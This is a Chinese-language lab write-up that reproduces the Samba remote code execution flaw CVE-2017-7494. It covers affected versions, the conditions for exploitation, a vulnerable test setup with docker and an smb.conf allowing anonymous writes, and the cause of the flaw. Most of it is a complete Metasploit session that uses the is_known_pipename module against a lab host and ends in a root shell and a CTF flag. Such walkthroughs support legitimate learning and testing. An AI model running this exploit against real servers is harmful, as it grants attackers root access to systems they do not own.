Samba远程代码执行漏洞(CVE-2017-7494)

漏洞描述

---

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

该漏洞CVE-2017-7494又被称为Linux版永恒之蓝，主要是利用smb上的反弹shell漏洞，进行远程代码执行。

参考：https://www.cnblogs.com/Hi-blog/p/7782356.html

---

影响版本

---

Samba 3.5.0之后的所有版本；

在4.6.4/4.5.10/4.4.14修复了这个漏洞。

---

FOFA语句

无

利用条件

• 服务器打开了文件/打印机共享端口445
• 共享文件拥有访问以及写入权限，如：匿名可写等
• 攻击者知道共享的目录路径

环境搭建

docker搭建

cd /opt/vulhub/samba/CVE-2017-7494/
docker-compose up -d

Linux搭建

测试环境：ubuntu-14.04.1-server-amd64 （安装系统时勾选samba）

/usr/sbin/samba -V

匿名访问配置(测试推荐)

# 创建一个共享目录
mkdir /home/share
chmod 777 /home/share

# 修改配置文件/etc/samba/smb.conf,在配置文件最后添加如下内容：
[myshare]
comment=smb share test
browseable=yes #可读
writeable=yes #可写
path=/home/share  #设置目录（上一步创建的共享目录）
public = yes #允许匿名登录

# 　ubuntu下可以用如下命令来运行和停止服务：
/etc/init.d/smbd start  #开启
/etc/init.d/smbd stop   #关闭
/etc/init.d/smbd restart #重启
或：
service smbd start
service smbd stop
service smbd restart

非匿名访问配置

# 修改配置文件/etc/samba/smb.conf，如下：
[myshare]
comment=smb share test
browseable=yes #可读
writeable=yes #可写
path=/home/share  #设置目录（上一步创建的共享目录）
public = no #不允许匿名登录

# 在 [global] 设置选项中添加配置：
security = user

之后，需要添加一下用户以备登陆之需：

useradd user
smbpasswd -a user
service smbd restart

漏洞复现

漏洞原理

在is_known_pipename()函数中，并没有检查管道名称中的特殊字符，加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件，执行任意代码。

漏洞利用

在kali中使用msfconsole工具；

root@kali:/opt/tools/CVE-2017-3066# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] 	/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v5.0.99-dev                          ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 345 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

[*] Starting persistent handler(s)...
msf5 > search CVE-2017-7494

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/linux/samba/is_known_pipename  2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load


msf5 > use exploit/linux/samba/is_known_pipename 
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > set rhosts 192.168.77.211
rhosts => 192.168.77.211
msf5 exploit(linux/samba/is_known_pipename) > set rport 37483
rport => 37483
msf5 exploit(linux/samba/is_known_pipename) > run

[*] 192.168.77.211:37483 - Using location \\192.168.77.211\share\ for the path
[*] 192.168.77.211:37483 - Retrieving the remote path of the share 'share'
[*] 192.168.77.211:37483 - Share 'share' has server-side path '/tmp/
[*] 192.168.77.211:37483 - Uploaded payload to \\192.168.77.211\share\afvoZDYY.so
[*] 192.168.77.211:37483 - Loading the payload from server-side path /tmp/afvoZDYY.so using \\PIPE\/tmp/afvoZDYY.so...
[-] 192.168.77.211:37483 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.77.211:37483 - Loading the payload from server-side path /tmp/afvoZDYY.so using /tmp/afvoZDYY.so...
[+] 192.168.77.211:37483 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.77.211:37483) at 2021-11-12 01:12:09 -0500

ls
flag-{bmhb65f3024-ff71-45ce-9d8d-9adb0676081a}
whoami
root